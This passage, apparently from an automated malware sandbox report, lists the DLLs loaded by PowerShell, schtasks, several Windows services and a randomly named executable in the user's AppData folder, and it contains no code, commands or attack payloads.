              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\alg.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\alg.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\alg.exeSection loaded: webio.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\alg.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: drprov.dll
              Source: C:\Windows\System32\alg.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dll
              Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dll
              Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dll
              Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\alg.exeSection loaded: browcli.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: iphlpapi.dll
